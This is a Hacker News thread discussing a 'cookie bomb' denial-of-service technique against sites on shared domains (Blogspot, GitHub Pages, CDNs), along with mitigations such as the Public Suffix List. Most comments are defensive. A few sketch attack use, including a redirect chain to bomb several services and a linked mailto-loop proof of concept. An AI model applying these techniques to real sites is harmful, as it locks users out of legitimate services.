Hacker News new | past | comments | ask | show | jobs | submit login
Cookie Bomb or Let's Break the Internet (homakov.blogspot.com)
362 points by paulmillr on Jan 18, 2014 | hide | past | favorite | 75 comments



The DoS won't work on most of the specific example services mentioned in the post (Blogspot, GitHub, etc.), at least not if the user is using a modern browser, because most of the big names have such cookies blacklisted by browsers.

The mechanism is the Public Suffix List, which was originally created because there needed to be a list to keep track of which TLDs used public second-level domains and only allowed registrations in the third level. For example, while foo.example.com and bar.example.com are both owned by example.com, foo.co.uk and bar.co.uk are two different domains, since co.uk is part of the UK domain hierarchy (along with ac.uk and so on) and registrations happen at the third level. Therefore it would be undesirable if foo.co.uk could set cookies for the entire .co.uk, as in the UK ccTLD world that's equivalent to setting a cookie for all of .com.

So there's a big list (initiated by Mozilla) specifying that .com is a public suffix, .co.uk is a public suffix, etc., and wildcard cookies on public suffixes are refused. This has been adapted, as a huge hack, to big sites that have user-registerable subdomains. So now .blogspot.com is also treated as a public suffix, since anyone can "register" a foo.blogspot.com under it.

However new entries are added on a fairly ad-hoc basis, so a site that allows user subdomains that can run JS is vulnerable by default unless they explicitly get themselves added. I notice Dropbox isn't there, for one.

The list: http://publicsuffix.org/


Works in Chrome. Actual "bombing" works in FF too, but doesn't affect top-level domain.

That's semi-solution. How is it going to help mysite.cdn.com/file1 to bomb mysite.cdn.com/other-files...

Also look at translate.googleusercontent.com, if you bomb it, Google Translate will stop working.

I think public suffix is great and useful idea but it should be solved by browsers too & length should be limited


> Works in Chrome.

Hmm, looks like Chrome isn't respecting the Public suffix list for setting cookies ATM, even though the site for the list claims that it does.[0]

For an example, view [1] and [2] in Chrome, and note that cookies set by [1] are viewable by [2] even though this shouldn't be allowed given blogspot's entry in the public suffix list. Firefox doesn't exhibit this behaviour, and I'm thinking this is a recent regression in Chrome, but who knows.

> Also look at translate.googleusercontent.com, if you bomb it, Google Translate will stop working.

I haven't taken a look at it, but would it make sense to add dynamic <original>.translate.googleusercontent.com subdomains for translated sites and add the base domain to the public suffix list?

> it should be solved by browsers too & length should be limited

IMO this is only going to be solved by a revision to the spec that resolves the ambiguity. The core issue is that browsers and servers disagree as to what a "reasonable" cookie jar size is, and servers are rejecting request with "unreasonably" large cookie jars.

Until those limits are actually part of a spec that people follow, someone's going to be sending too much or allowing too little and legitimate requests will get rejected.

I don't know if you've read Michal's "The Tangled Web" or the Browser Security Handbook but they both go into it a little.[3]

[0]: http://publicsuffix.org/learn/ (under Chromium)

[1]: http://cookietestblog1.blogspot.com/2014/01/cookie-test.html

[2]: http://cookietestblog2.blogspot.com/2014/01/cookie-test.html

[3]: http://code.google.com/p/browsersec/wiki/Part2#Same-origin_p... (under cookie jar size)


>I haven't taken a look at it, but would it make sense to add dynamic <original>.translate.googleusercontent.com subdomains for translated sites and add the base domain to the public suffix list?

random hash as a sandbox.<hash>.guc.com will work.


The public suffix list has two purposes: browsers won't accept wildcard cookies (desirable) but also won't accept a wildcard certificate against that name (undesirable). It's true that nobody should have a certificate for * .com or * .co.uk, but it is reasonable for Google to have * .blogspot.com.

To remove the cross-site exposure in shared domains using the PSL, there'd need to be an extra bit expressed with every entry in the PSL. Alternately, browsers could re-try the request without any cookies.


Oh, I had no idea they started adding domains like blogspot.com--that's clever! They must have just started doing that recently. And not quite as much of a hack as you say, really, since the justification is the same as the other suffixes.


The justification is the same, but it seems much less feasible to be "complete". There are a pretty manageable number of TLDs, and they generally have published policies about what they'll publicly register, so you can plausibly collect a complete list of which suffixes are public ones. But covering stuff like blogspot.com has to be done on a case-by-case basis and will be wildly incomplete. It mitigates the problem by including some of the higher-profile sites, but it doesn't seem like it can solve it generally.


Couldn't a solution be something stored in DNS, that tells browsers not to let subdomains' JS do this?

So if I own example.com I could set something in my DNS that would prevent subdomain.example.com from setting cookies on example.com.


Wouldn't a relatively simple fix for this be to detect this at the front end, and serve a static page with JavaScript that clears all of their cookies and then redirects back?


If I understand this correctly, that would be after the client has sent umpteen MB or GB of cookie data to you, and you've hopefully detected what's going on and are just routing the request to /dev/null by this time. If, after that, the sending of the request hasn't caused a timeout, sure, we can send some JS to delete cookies.


nice! HN should use this list for the domain display.


Combined with simple XSS(or any other problem, modern websites are full of such bugs) this DoS will work.


This is something Zalewski has written about: http://lcamtuf.blogspot.com/2010/10/http-cookies-or-how-not-... --- if this kind of thing is interesting to you, his latest book, _The Tangled Web_, is excellent.


That page, and the linked browsersec pages on Google Code, are terrifying. Time to burn it all down and start from scratch.

I was particularly stunned to learn HTTP Cookie headers can clobber 'secure' cookies set over HTTPS. Eye-popping.


And to increase your terror, check out http://lcamtuf.coredump.cx/postxss/


Another vote for The Tangled Web. It's a great read.


I read that post before, maybe I missed, but where he says about DoS possibilities of cookie tossing?


Search for "Does this matter from a security perspective".

Also: take a crack at the CTF we set up. I think (a) you'll do well at it and (b) it'll be fun to watch you. http://microcorruption.com.


Yes, now I see. Weird it stayed not fixed, Public suffix list is not implemented in Chrome.

Anyway, the list is not even close to real solution (just had long discussion with @titanius on twitter why not). So many quirks and use cases of <sub>.domain.

> it'll be fun to watch you

uh. hmm, ok.


No pressure there.


You too! You helped us plan the damn thing!


The attack was also discussed in details here: http://mixedbit.org/blog/2013/04/11/dos_attack_on_cdn_users....


The impact on CDN providers is kinda scary.

To take an example we all know and love, a malicious *.cloudfront.net distribution could be setting cookies against cloudfront, breaking all your fancy static asset serving from cloudfront.

Is there a mitigation other than _always_ having to use a myappname-static.com domain name?

Thinking about this at a higher level -- there are some interesting similarities to "shared hosting" resource contention, but this time with domain names on CDNs. If somebody executes a forkbomb on your shared host, you're hosed. If somebody executes a cookiebomb on your CDN provider SLD, you're hosed.

Browser vendors could prevent this with good second level domain support. Register cloudfront, akamai, etc domain names as only hosting user-created content on third level domains. Pin large examples to the browser distribution, and allow TXT records in DNS specifying this at the top level.


Web browsers could also mitigate against it by limiting the size of their requests. If too many cookies have been set, throw away the older ones until the request is small enough to likely be accepted by most web servers.

It's not a perfect fix, nor does it solve the wider issue of letting one domain set a cookie for a domain that it has no authority over, but it would stop people being blocked from a site with a bizarre 500 error. Worst case, a login/ID cookie gets flushed and the user has to log in again.


Interesting. Just this week I had to investigate the exact same issue at my job. One user (of course it was the CEO...) had accumulated so many cookies that on some pages of our website he ran into the HTTP request header limit and would only get a 500 error page.

One risk factor is using JavaScript based third party services that use cookies with your host name. In our case, it was Optimizely that was storing pretty significant amounts of data in cookies. Not really sure how to tackle this issue.


We had the same issue with Optimizely cookies. They serialize the experiment data as a json blob, which grows with more experiments, and store it in a cookie. What a pain to debug as it wasn't consistent for every user.


Bump up the limit in the web server config ;)


Forgot to mention that we're using Akamai, and it's actually Akamai's servers that are hitting the limit. We'll see if we'll be able to convince them to bump up the limit. I have a hunch that there might be some resistance because of performance implications (I'm not an operations guy, my knowledge of how web servers work internally is limited). On the other hand, it seemed to intermittently work, so there may be some servers in their farm that are configured differently. Or it could have been due to fluctuations in the header length because of different query string lengths and cookie changes.


Pretty clever. This appears to be in the same vein as that trick where you could use popups to spawn more popups, and by the time the user realized what was going on their computer was completely unresponsive. (fixed with popup blocking in any browser in the last decade.)

Also, Fill my Disk: http://www.filldisk.com/ (local storage bomb)

Implementing limits on the number of cookies would seem to be the natural solution to the problem in the OP, although I doubt this problem is "worth" solving in practice since most people seem to be using cookies to do what they were meant to do.


> This appears to be in the same vein as that trick where you could use popups to spawn more popups, and by the time the user realized what was going on their computer was completely unresponsive. (fixed with popup blocking in any browser in the last decade.)

I recently visited a site that did something similar but was still effective. It opened up mailto: URI's in a loop and since I had Thunderbird set up to handle the links, it practically killed my X session.


Interesting. Quick test result: looks like flipping network.protocol-handler.external.mailto in the firefox config to false prevents this (of course, in the process, prevents action on mailto links).

There's an open bug in regards to this issue: https://bugzilla.mozilla.org/show_bug.cgi?id=566893


It shouldn't be possible to launch mailto links without an interactive prompt; if it is, please file a bug on the browser.


Simple proof of concept: http://jsfiddle.net/rVxkv/

This opens 2 Thunderbird windows in Firefox 26 but only one in Chromium 31.0.1650.63.

edit: I totally agree it shouldn't be possible :)


I've never seen a prompt to open a mailto: link. Where is it specified there should be one?


I think by "interactive prompt" he means "user interaction".


I suppose I can see an argument for popping something up before firing the schema handler when something sets location.href to a mailto: URL, but that seems like the sort of thing where you'd really want to wait for evidence that it's a problem for anyone before you implement it; it both annoys the user and complicates your code, neither of which is desirable in the absence of real provocation.


not amount, but total Length of the Cookie header. Otherwise number of cookies will be ~5.

Yes I recall filldisk.com, but that one doesn't seem harmful to user (he knows where it comes from & exploit is quite slow).

Cookie bomb can "bomb" some exact path, so the trick has many uses. E.g. you can "block" /dont_like_this_post on blogspot entirely, while the rest of Blogger will work.


The extra level of subdomain as proposed by Homakov, seems like a much more worthwhile fix.


There's a similar self-denial of service you can run into when you're injecting javascript and cookies into third-party pages.

Optimizely (YC W10) had this problem when they were setting cookies on a single domain across all of their customer sites. If you happened to be the kind of user that visited websites that had a high chance of using Optimizely, you quickly accumulated enough cookie to make their fronting proxy reject your request for their JS.


Why isn't the obvious fix discussed: Change browsers to not let subdomains set cookies for parent domains.

Probably this feature is of critical use. If so, would be grateful if someone explains it to me.


One common use is to pass session data between subsections of a site. For example, the user logs into www.example.com, and is still logged in when they head over to store.example.com.


That could be also implemented in my proposed fix by example.com setting the auth cookies. They will continue to be readable by store.example.com.

Sure, it will require a change on the server side, which is a pain. But I can't think of a practical scenario which will be impossible to implement with the proposed fix.


Your idea would likely break any site on the internet that uses authentication and subdomins, isn't it clear why this isn't being considered?


Or sites could opt-in to this with a header?

EDIT: homakov says the same thing down thread.


Yes, it is backwards incompatible. Perhaps it could be enforced in HTTP 2?


How do you set a cookie on a domain you do not control? Won't the browser only send cookies to a server on the domain you are trying to browse to?

EDIT: found it - not any, arbitrary site can be DOS

"Who can be cookie-bombed? Blogging/hosting/website/homepage platforms: Wordpress, Blogspot, Tumblr, Heroku, etc."


- "If you're able to execute your own JS on SUB1.example.com it can cookie-bomb not only your SUB1 but the entire *.example.com network, including example.com"

So you've got to be able to execute JS in a subdomain to plant a cookie bomb that will affect the entire domain.


This is for domains that serve user-provided Javascript, such a blog hosts and GitHub.


Who can be cookie-bombed? Blogging/hosting/website/homepage platforms: Wordpress, Blogspot, Tumblr, Heroku, etc.

WordPress.com would not be vulnerable since users cannot upload or execute arbitrary JavaScript.


I didn't like the web protocols

Now I like them even less.


[deleted]


No, not like this. You can block some path, but you cant set domain=dontlike.host.com; Only entire *.network.


No, foo.example.com cannot set a cookie for bar.example.com. It can only set cookies for itself and example.com.


Terry Davis scares me.


It's really interesting. The problem is that i don't see any fix for it. The only way would be to update the browsers, or maybe use a plugin to block such attacks.


Or serve the untrusted content from a sub-subdomain, e.g. "foo.bar.CDN_HOST.com", so that you could only bomb bar.CND_HOST.com and not the entire domain


You'd think a higher level domain should be able to specify whether a subdomain can set cookies for it or not.


That would be nice, but it would have a lot of ramifications. Before setting the cookie, the browser would need to know if it's allowed, so presumably it would have to load some file. Perhaps this could be done in a manner similar to CORS requests


Content-Security-Policy: can-set-cookies: no!

BTW if JS is of we can use <meta http-equiv Set Cookie>


It might be better to allow:

Content-Security-Policy: can-set-cookies-for-parent-domain: no!

There's no harm in letting haxx0r.blogspot.com set cookies for haxx0r.blogspot.com. It's only cookies for blogspot.com that should be restricted.


Well OK then.


Seems the way to do this would be to create accounts on all the services you want to bomb and set up JavaScript redirects so that hitting one will set the cookies and redirect to the next host. Have it be in a loop so that any entry into the redirect loop is possible. By definition, once you hit the first host in the chain again, your request will be denied.

The question is how to get people to visit a site that loads one of those URLs...


Possible detection method (server side)? If the request is too long due to cookie length, then look at the last URL the client IP hit. That should be the URL creating the long cookies. Remove the offending URL / resource.


That won't work, and could be easily abused by crafting your own requests to blame any arbitrary URL of your choosing.

Plus, servers drop huge requests because they are most likely malformed or DOS attempts. Attempting to do extra work (like tracking down previous visits by the client) will only make matters worse for the server.


Hmmm. Yes,I see the potential for abuse. Why do you say it would not work though?


This was happening on my Gmail account a few weeks ago. It was a little disconcerting. I never figured out what was wrong but it seemed to fix itself after I deleted cookies a few times.


Is this the reason I can't access any *.github.io right now?

Is there an equivalent to status.github.com for github.io?


Have... you tried clearing your cookies? :-)


! I should actually read the content of articles. That's enough internet for today.


> Is there an equivalent to status.github.com for github.io?

If you want to check the status of your own GH Pages hosted site, you can go to your repository for the page, then go to "Settings > Health" and you can see a basic status for Server Status, Usage, and Repository Integrity.


I don't see that. Did you just out a staff only feature? ;)


github.io works for me right now.


Surely if you were able to do this, you would use it for cookie tossing rather than this simple mischief?


Cookie tossing are not always helpful. If session is properly tied with csrf token there's not much you can do with it.


homakov, you have a fun job.


pointsIterator++;

Works on Iceweasel 17.0.10.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: